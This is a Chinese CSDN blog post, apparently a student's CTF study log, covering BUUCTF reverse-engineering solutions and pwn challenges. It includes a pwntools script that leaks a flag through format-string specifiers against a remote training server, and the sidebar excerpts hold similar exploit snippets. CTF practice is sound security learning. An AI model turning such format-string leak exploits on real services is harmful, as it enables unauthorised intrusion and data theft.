21 08 10学习总结

最新推荐文章于 2024-10-21 08:33:22 发布
最新推荐文章于 2024-10-21 08:33:22 发布
阅读量968 收藏
点赞数 1
分类专栏: Pwn Re 学习经历
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/eeeeeight/article/details/119584519
版权
学习经历 同时被 3 个专栏收录
83 篇文章 3 订阅
订阅专栏
Pwn
32 篇文章 0 订阅
订阅专栏
Re
3 篇文章 0 订阅
订阅专栏

21.08.10学习总结

Column: August 10, 2021
Tags: learning experience

不知道什么时间-不知道什么时间: buu刷题

Re:

不一样的flag: 迷宫题の初体验, 一开始IDA的分析不对导致分析题目分析不出来, 就问了一下学长如何修改IDA的stack显示(先edit-undefined, 再右击选择array啥的或者按D表示define啥的), 而后就是分析迷宫, 由于这个字符串被默认认为是在末尾加上\x00了, 所以才被识别为char[26], 实际迷宫是char[25]的

在这里插入图片描述

后面我看网上分析说因为25可以被5整除, 所以就变成了55的迷宫, 我认为这样说不够严谨, 应该是根据下面的代码合理分析与猜想得到的55(主要是5*v4这玩意)

在这里插入图片描述

后面我们的迷宫就如下了:

* 1 1 1 1
0 1 0 0 0
0 1 0 1 0
0 0 0 1 0
1 1 1 1 #

看图的话就是直接可以眼睛看出来, 但是分析代码的话就是你改变v4, v5的值, 在满足如下条件的最短路径即可:

*(&v8 + 5 * v4 + v5 - 0x29) != '1' && *(&v8 + 5 * v4 + v5 - 0x29) == '#'

刮开有奖: 一道base64+其它一丢丢奇怪加密的玩意, 主要要注意的是IDA识别sub_4010F0的参数可能怪怪的, v7到v16应该算一整个数组, 如何4010F0如果要转换成C的话, 里面4i啥的在int32数组里可以直接写成a1[i], 毕竟44=16位=4字节嘛(摊手)

在这里插入图片描述

然后它的base64比我之前的写的短, 因为是限制好的6字节, 所以只有一种情况, 写特定解法就行了, 我之前写的通解, 主要base64先找这种key值就能很快识别咯

在这里插入图片描述

其次%3啊, &0x3F之类的都算是base64的特征

Pwn:

jarvisoj_level5: 基础ret2shellcode, 没高兴自己写

gyctf_2020_some_thing_interesting: 简单的uaf, 有个格式化字符串可以直接泄露libc了(unsorted用不了, 要不然这题太白给了), 做了会自己也没高兴做了

picoctf_2018_echooo: 两种解法, 一个是先想办法搞出栈地址, 然后写上flag的地址, 再%x$s这样读, 另一个是和我一样nt, 直接很多%p读, 然后傻逼兮兮的写个解十六进制输出的脚本

exp:

RE:

刮开有奖(主要是解前两位的, 后面的自己找个base64就行):

#include <stdlib.h>
#include <stdio.h>
#include <iostream>
using namespace std;
int decode1(char a1[], int a2, int a3)
{
    int result; // eax
    int i; // esi
    int v5; // ecx
    int v6; // edx

    result = a3;
    for (i = a2; i <= a3; a2 = i)
    {
        v5 = i;
        v6 = a1[i];
        if (a2 < result && i < result)
        {
            do
            {
                if (v6 > a1[result])
                {
                    if (i >= result)
                        break;
                    ++i;
                    a1[v5] = a1[result];
                    if (i >= result)
                        break;
                    while (a1[i] <= v6)
                    {
                        if (++i >= result)
                            goto LABEL_13;
                    }
                    if (i >= result)
                        break;
                    v5 = 4 * i;
                    a1[result] = a1[i];
                }
                --result;
            }       
            while (i < result);
        }
    LABEL_13:
        a1[result] = v6;
        decode1(a1, a2, i - 1);
        result = a3;
        ++i;
    }
    return result;
}

_BYTE* __cdecl sub_401000(int a1, int a2)
{
    int v2; // eax
    int v3; // esi
    size_t v4; // ebx
    _BYTE* v5; // eax
    _BYTE* v6; // edi
    int v7; // eax
    _BYTE* v8; // ebx
    int v9; // edi
    int v10; // edx
    int v11; // edi
    int v12; // eax
    int i; // esi
    _BYTE* result; // eax
    _BYTE* v15; // [esp+Ch] [ebp-10h]
    _BYTE* v16; // [esp+10h] [ebp-Ch]
    int v17; // [esp+14h] [ebp-8h]
    int v18; // [esp+18h] [ebp-4h]

    v2 = a2 / 3;
    v3 = 0;
    if (a2 % 3 > 0)
        ++v2;
    v4 = 4 * v2 + 1;
    v5 = malloc(v4);
    v6 = v5;
    v15 = v5;
    if (!v5)
        exit(0);
    memset(v5, 0, v4);
    v7 = a2;
    v8 = v6;
    v16 = v6;
    if (a2 > 0)
    {
        while (1)
        {
            v9 = 0;
            v10 = 0;
            v18 = 0;
            do
            {
                if (v3 >= v7)
                    break;
                ++v10;
                v9 = *(unsigned __int8*)(v3 + a1) | (v9 << 8);
                ++v3;
            }       while (v10 < 3);
            v11 = v9 << (8 * (3 - v10));
            v12 = 0;
            v17 = v3;
            for (i = 18; i > -6; i -= 6)
            {
                if (v10 >= v12)
                {
                    *((_BYTE*)&v18 + v12) = (v11 >> i) & 0x3F;
                    v8 = v16;
                }
                else
                {
                    *((_BYTE*)&v18 + v12) = 64;
                }
                *v8++ = byte_407830[*((char*)&v18 + v12++)];
                v16 = v8;
            }
            v3 = v17;
            if (v17 >= a2)
                break;
            v7 = a2;
        }
        v6 = v15;
    }
    result = v6;
    *v8 = 0;
    return result;
}

int main()
{
    char v7[30] = {90,74,83,69,67,97,78,72,51,110,103};
    decode1(v7, 0, 10);
    printf("%c%c", (v7[0]+34), v7[1]);
    return 0;
}

Pwn:

PicoCTF_2018_echooo(跑不出来多跑几次):

#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=remote('node4.buuoj.cn',26428)
#sh=process('./PicoCTF_2018_echooo')

sh.recv()
payload=''
for i in range(20):
    payload+='%'+str(27+i)+'$p'
sh.sendline(payload)
flag=sh.recvuntil('(nil)')
flag=flag[:-5]
flag_len=len(flag)
new_flag=''
i=0
while i<flag_len:
    ii=i+1
    if flag[i]=='0' and flag[ii]=='x':
        i=i+2
        if flag[i]=='a':
            i=i+1
        continue
    new_flag+=flag[i]
    i+=1

print new_flag

i=0
new_flag_len=len(new_flag)
final_flag=''
tmp_flag=''
while i<new_flag_len:
    if i%8 == 0 and i !=0:
        for a in range(4):
            final_flag+=tmp_flag[3-a]
        tmp_flag=''
    ii=i+1
    tmp=int(new_flag[i], 16)*16+int(new_flag[ii], 16)
    tmp_flag+=chr(tmp)
    i+=2

tmp_flag_len=len(tmp_flag)
for i in range(tmp_flag_len):
    final_flag+=tmp_flag[tmp_flag_len-i-1]

print final_flag
sh.interactive()

逼话环节:

最近不玩游戏了, 真要学内核了, 呜呜呜, 明天要做手术了

北岛静石
关注
专栏目录
buuoj Pwn writeup 161-165
yongbaoii的博客
05-30 413
161 picoctf_2018_echooo 就是格式化字符串 flag被读到了栈上,直接泄露就行。 # -*- coding: utf-8 -*- from pwn import * context.log_level = "debug" r = remote('node3.buuoj.cn',25088) offset=11 flag='' for i in range(27,27+11): payload='%{}$p'.format(str(i)) r.sendlin
picoctf_2018_echooo
doudoudedi
09-23 544
发现是简单的32位格式化字符串但是并且flag存了栈上,直接泄漏就行了,但是内存是小端存储的,所以倒序输出即可 exp: from pwn import * #p=process('./PicoCTF_2018_echooo') p=remote('node3.buuoj.cn',26798) offset=11 flag='' for i in range(27,27+11): payload='%{}$p'.format(str(i)) p.sendlineafter('> ',p
快速学习GO语言总结
最新发布
张彦峰的博客
10-21 1万+
针对有一定计算机语言基础人员快速掌握go语言,直接快速开始学习之旅
机器学习入门基础(万字总结)(建议收藏!!!)
subsistent的博客
12-04 5万+
机器学习是人工智能的重要技术基础,涉及的内容十分广泛。本文章涵盖了机器学习的基础知识,主要包括机器学习的概述、 回归、分类、聚类、神经网络、文本分析、图像分析、深度学习等经典的机器学习基础知识,还包括深度学习入门等拔高内容。介绍机器学习的基础概念和知识,包括机器学习简史、主要流派、与人工智能、数据挖掘的关系、应用领域、算法、一般流程等。伴随着计算机计算能力的不断提升以及大数据时代的迅发展人工智能也取得了前所未有的进步。
机器学习1000+篇文章总结
02-28 9319
机器学习1000+篇文章总结 本文收集和总结了有关机器学习1000+篇文章,由于篇幅有限只能总结近期的内容,想了解更多内容可以访问:http://www.ai2news.com/, 其分享了有关AI的论文、文章、图书。 吴恩达机器学习-9-降维PCA http://www.ai2news.com/blog/12185/ 机器学习也有弱点?哪些是机器学习的未解之谜? http://www.ai2news.com/blog/39473/ 一站式机器学习平台建设实践 http://www
2021-08 总结
郑清
08-29 569
文章目录8月作息表8月技术8月感情 8月作息表 日期 早上 中午 下午 晚上 回家安排 今日总结 2021-08-29 星期天 晴???? 10:30起床 12:00吃饭 打疫苗,学习 20:00 吃饭,休息 22:00 休息 休息日 2021-08-28 星期六 雨???? 11:30起床 15:00吃饭,学习 20:00 吃饭,休息 2:00 休息 休息日 2021-08-27 星期五 晴???? 7:30起床,8:10出门,8:50到公司 12:00吃饭 上班 20:00 吃
学习C++方法总结
qq_34029983的博客
09-08 1万+
转自:http://blog.csdn.net/yong2016/article/details/9321837 看了这篇文章才知道自己最近太浮躁了,学做技术也是学做人。 读者定位是两类人群:a.初学者,即将入手 C++ 语言、不知道如何开始;b.已经开始学习C++许久了,却进度缓慢,抓不到精髓,倍感迷茫。 本文不会深入到C++语言内部挖掘技术点。 如果你自诩C++高手,请绕道;如果...
MySQL数据库总结
热门推荐
匿名攻城狮
11-25 12万+
一、数据库简介 数据库(Database,DB)是按照数据结构来组织,存储和管理数据的仓库。 典型特征:数据的结构化、数据间的共享、减少数据的冗余度,数据的独立性。 关系型数据库:使用关系模型把数据组织到数据表(table)中。现实世界可以用数据来描述。 主流的关系型数据库产品:Oracle(Oracle)、DB2(IBM)、SQL Server(MS)、MySQL(Oracle)。 数据表:数...
度量学习方法总结
时间虚掷的孤岛
06-22 2799
目录 一.距离度量 闵可夫斯基距离 欧式距离(Euclidean Distance): 标准化欧氏距离(Standardized Euclidean distance ) 曼哈顿距离(ManhattanDistance) 切比雪夫距离(Chebyshevdistance) 马氏距离 马氏距离代码示例: 夹角余弦 相关系数( Correlation coefficient )...
一篇文章足够你学习蓝牙技术,提供史上最全的蓝牙技术(传统蓝牙/低功耗蓝牙)文章总结,文档下载总结(2024/10/02更新)
朝气蓬勃
08-03 10万+
那由于学员反馈蓝牙精讲没有一个目录介绍,再次我整理一个目录。我们的蓝牙书以及CSDN蓝牙系列的视频有以下计划: 告知:初学蓝牙者暂时不要碰controller(蓝牙芯片)里面的协议,否则会看到你怀疑人生 那我们就一一来列举下(持续更新次文章,每周一更这篇文章) 第一篇:蓝牙综合介绍 主要介绍蓝牙的一些概念,产生背景,发展轨迹,市面蓝牙介绍,以及蓝牙开发板介绍,内容如下: 章节 文章标题 文章链接 视频课程 第一章 蓝牙概述 1. 蓝牙的基本概念以及发展轨迹.
pcb-2020-10-21_STC8G1K08A_stc8g_STC8Goled_pcb_源码.zip
09-30
标题中的"pcb-2020-10-21_STC8G1K08A_stc8g_STC8Goled_pcb_源码.zip"表明这是一个关于PCB设计的项目,时间戳为2020年1021日。其中涉及到的微控制器是STC8G1K08A,这是一个属于STC8G系列的8位单片机,专为嵌入式...
计算机教师专业技术工作总结.pdf
03-25
此外,还包含一些日期和时间戳信息,如“2007-08-01 21:24:00”和“2010-09-10”,可能表示文档中记录的工作时间或活动时间。 尽管提供的内容较为零散,我们可以尝试从中提炼出可能的知识点,并构建一个计算机教师...
区块链学习总结
leveretz的博客
02-08 3312
1、比特币要解决的核心问题是创造一种可信的数字凭证。由于这种凭证可信,所以能够当做货币。2、比特币特点:不会被偷走;无法伪造;无法大批生成。1、区块包含:区块头、区块体。2、区块投包括:生成时间、区块体的Hash、上一个区块的Hash。。。3、采矿,工作量证明:比特币平均每10分钟生成新区块,1小时也就6个。加大计算Hash的难度。保证各节点的同步。4、只有满足条件的Hash才会被区块链接收。区块...
2021羊城杯pwn部分wp
eeeeeight的博客
09-12 6535
前言: 羊城杯的how2heap没做出来, rctf也爆零了, 哎, 颓了 BabyRop: 最基础的栈溢出rop链, 直接贴exp了: from pwn import * #p=process('./BabyRop') p=remote('192.168.41.23', 11000) context.log_level='debug' sh=0x804c029 system=0x80490a0 #gdb.attach(p,'b *0x804926a') p.sendline('a'*0x28+'b'*
2021长城杯pwn部分wp
eeeeeight的博客
09-19 6062
前言: 就, 除了vmpwn都是基础glibc的heap题 king_in_heap_1: delete函数没有把free后的指针置零, 存在uaf, 然后用unsortedbin的fd指向io结构体泄露libc, 然后mallochook上用realloc调整一下, 打onegadget就完事了 #!/usr/bin/env python # coding=utf-8 from pwn import * sh=remote('47.104.175.110',20066) #sh=process('./ki
2021鹤城杯pwn部分wp
eeeeeight的博客
10-09 2139
littleof 白给的ret2libc, 第一个输出泄露canary, 第二个输出泄露libc基址顺便控制一下返回地址再返回去输入, 之后就getshell咯(摊手) #!/usr/bin/env python #coding=utf-8 from pwn import* sh = remote("182.116.62.85", 27056) #sh = process('./littleof') elf = ELF('./littleof') libc = ELF('./libc-2.27.so')
Nov 26, 21在macOS 12.0.1上布置pwn环境
eeeeeight的博客
11-27 1833
前言: 不是让民那桑在mac上做amd架构的题目,我布置环境是为了以后方便pwn arm架构的题目/设备之类的(逃) Pwn environment: lldb && voltron && tmuxinator && pwntools: Because outstanding performance of Plugins in gdb like pwndbg, gef and so on. I choose to install gdb on my M1 Ma
2021东华杯pwn部分wp
eeeeeight的博客
11-01 1636
前言: 除了boom都蛮简单的, 第四个pwn因为boom做的有点久就没来得及, 看了眼感觉不难也就不想花时间再做了 cpp1: 由于change时std::cin的大小没有控制好, 所以cin可以输入很多字符, 导致了堆溢出, 且申请回来的时候没有手动清空fd位, 泄露了heap偏移, 得到了tcache结构体的地址, 利用堆溢出控制free块的fd就可以控制整个tcache结构体, 从而使得unsorted bin产生. 同上, 泄露libc偏移, 再利用fd写__free_hook与system, 再
ciscn2021初赛pwn部分wp
eeeeeight的博客
05-17 1210
ciscn2021初赛 感谢wepn的队友 Column: May 17, 2021 pwny: 首先ida看一眼发现read文件描述符全是3, 好像是读个随机数, 然后我们在3的地址上连着用Write读两次就可以把他变成0, 就可以写入内存了, 后面就是数组越界写, 负数可以往前面读读出libc偏移和pie偏移, 在得到libc之后可以获得环境变量environ的地址, 之后通过(libc_base+libc.sym[‘environ’]-pie_base-0x202060)/8, 就可以得到其位置是数组
21天Java学习之旅源码解析
10. 学习方法:这种将学习内容拆分为21天的学习方法有助于学习者管理学习进度,每天都能够有一个明确的学习目标,同时可以对学习内容进行定期的复习和巩固。 11. 源码调试:在学习过程中,源码的调试也是一个重要的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值